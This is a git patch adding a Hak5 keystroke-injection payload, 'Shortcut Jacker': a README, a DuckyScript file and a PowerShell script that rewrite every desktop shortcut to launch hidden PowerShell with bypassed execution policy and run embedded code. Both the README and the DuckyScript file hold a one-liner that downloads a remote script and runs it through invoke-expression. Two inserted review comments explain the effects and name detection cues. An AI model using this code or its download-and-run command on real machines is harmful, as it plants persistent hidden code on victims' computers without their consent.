From d8fe119ed1fe4a42984212b45d79096a4b7c0efc Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby
Date: Mon, 10 Oct 2022 23:35:38 -0500
Subject: [PATCH] Add files via upload
---
.../execution/-OMG-ShortcutJacker/README.md | 144 ++++++++++++++++++
.../Shortcut-Jacker-Execute.txt | 15 ++
.../-OMG-ShortcutJacker/Shortcut-Jacker.ps1 | 118 ++++++++++++++
3 files changed, 277 insertions(+)
create mode 100644 payloads/library/execution/-OMG-ShortcutJacker/README.md
create mode 100644 payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker-Execute.txt
create mode 100644 payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker.ps1
diff --git a/payloads/library/execution/-OMG-ShortcutJacker/README.md b/payloads/library/execution/-OMG-ShortcutJacker/README.md
new file mode 100644
index 0000000..5fab7e1
--- /dev/null
+++ b/payloads/library/execution/-OMG-ShortcutJacker/README.md
@@ -0,0 +1,144 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+
+
+

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Shortcut Jacker + +

+ + Python + +
YouTube Tutorial +

+ +A script used to embed malware in the shortcut on your targets desktop + +## Description + +This payload will run a powershell script in the background of any shortcut used on the targets desktop + +This is done by taking advantage of the ```Target``` field where powershell commands can be stored or run. + +This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the ```$code``` variable and it will still run. + +So if your command exceeds that consider using an IWR function to download and execute a longer script. + +I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13) + + + +Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored. + +--------------------------------------------------------------------------------------------------------------------------------------------------------- + + + +--------------------------------------------------------------------------------------------------------------------------------------------------------- + +Using the ```Get-Shortcut``` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the ```Target``` field. + + + +## Getting Started + +Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker-Execute.txt b/payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker-Execute.txt
new file mode 100644
index 0000000..cad1fd3
--- /dev/null
+++ b/payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker-Execute.txt
@@ -0,0 +1,15 @@
+REM Title: Shortcut-Jacker
+
+REM Author: I am Jakoby
+
+REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
+
+REM Target: Windows 10, 11
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr ?dl=1; invoke-expression $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
diff --git a/payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker.ps1 b/payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker.ps1
new file mode 100644
index 0000000..88de451
--- /dev/null
+++ b/payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker.ps1
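Review bot: The REM header in Shortcut-Jacker-Execute.txt names the title, author and target but never says what the `STRING` line does to the host, and the two REM lines about the link sit after `ENTER` instead of above the line they describe. The command starts a hidden PowerShell with `-Exec Bypass`, fetches a script with `iwr` and passes it straight to `invoke-expression`, so whatever the link serves at that moment is executed with no check on its content. I would add a header line such as `REM Effect: Run dialog -> hidden powershell -Exec Bypass -> downloads a script and runs it via invoke-expression (no integrity check)` and move the link reminder above `STRING`. That same command line is what process-creation and PowerShell script-block logging would show on a monitored host.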
@@ -0,0 +1,118 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This is payload used to inject powershell code into shortcuts
+
+.DESCRIPTION
+ This payload will gather information on the shortcuts on your targets desktop
+ That data will then be manipulated to embed a powershell script
+ This script will be ran in the background when the short cut is
+
+#>
+
+############################################################################################################################################################
+
+<#
+.NOTES
+ The powershell code stored in this variable is what will run in the background
+ This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code
+ variable and it will still run.
+#>
+
+$code = "Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')"
+
+############################################################################################################################################################
+
+function Get-Shortcut {
+ param(
+ $path = $null
+ )
+
+ $obj = New-Object -ComObject WScript.Shell
+
+ if ($path -eq $null) {
+ $pathUser = [System.Environment]::GetFolderPath('StartMenu')
+ $pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu')
+ $path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse
+ }
+ if ($path -is [string]) {
+ $path = dir $path -Filter *.lnk
+ }
+ $path | ForEach-Object {
+ if ($_ -is [string]) {
+ $_ = dir $_ -Filter *.lnk
+ }
+ if ($_) {
+ $link = $obj.CreateShortcut($_.FullName)
+
+ $info = @{}
+ $info.Hotkey = $link.Hotkey
+ $info.TargetPath = $link.TargetPath
+ $info.LinkPath = $link.FullName
+ $info.Arguments = $link.Arguments
+ $info.Target = try {Split-Path $info.TargetPath -Leaf } catch { 'n/a'}
+ $info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'}
+ $info.WindowStyle = $link.WindowStyle
+ $info.IconLocation = $link.IconLocation
+
+ return $info
+ }
+ }
+}
+
+#-----------------------------------------------------------------------------------------------------------
+
+function Set-Shortcut {
+ param(
+ [Parameter(ValueFromPipelineByPropertyName=$true)]
+ $LinkPath,
+ $IconLocation,
+ $Arguments,
+ $TargetPath
+ )
+ begin {
+ $shell = New-Object -ComObject WScript.Shell
+ }
+
+ process {
+ $link = $shell.CreateShortcut($LinkPath)
+
+ $PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() |
+ Where-Object { $_.key -ne 'LinkPath' } |
+ ForEach-Object { $link.$($_.key) = $_.value }
+ $link.Save()
+ }
+}
+
+#-----------------------------------------------------------------------------------------------------------
+
+function hijack{
+$Link = $i.LinkPath
+$Loc = $i.IconLocation
+$TargetPath = $i.TargetPath
+if($Loc.length -lt 4){$Loc = "$TargetPath$Loc"}
+$Target = $i.Target
+if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconLocation "$Loc" -Arguments "-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code" -TargetPath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"}
+}
+
+#-----------------------------------------------------------------------------------------------------------
+
+Get-ChildItem –Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}
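Review bot: `hijack` overwrites `TargetPath`, `Arguments` and `IconLocation` on every desktop `.lnk` via `Set-Shortcut`, and the original `Arguments` value that `Get-Shortcut` read is discarded, so the script leaves no way to restore a shortcut after an authorised test. The `.DESCRIPTION` block also stops mid-sentence (`when the short cut is`) and nowhere states what is changed on disk. I would finish that sentence and add a `.NOTES` line such as `Modified shortcuts have TargetPath set to powershell.exe and Arguments starting with -w h -NoP -NonI -Exec Bypass; original values are not saved`, which is also what a responder would search desktop shortcuts for. As a style point, `hijack` takes its input from the caller's `$i` and `$code` variables and ignores the `$_.FullName` argument passed on the last line; declared parameters would make that dependency visible.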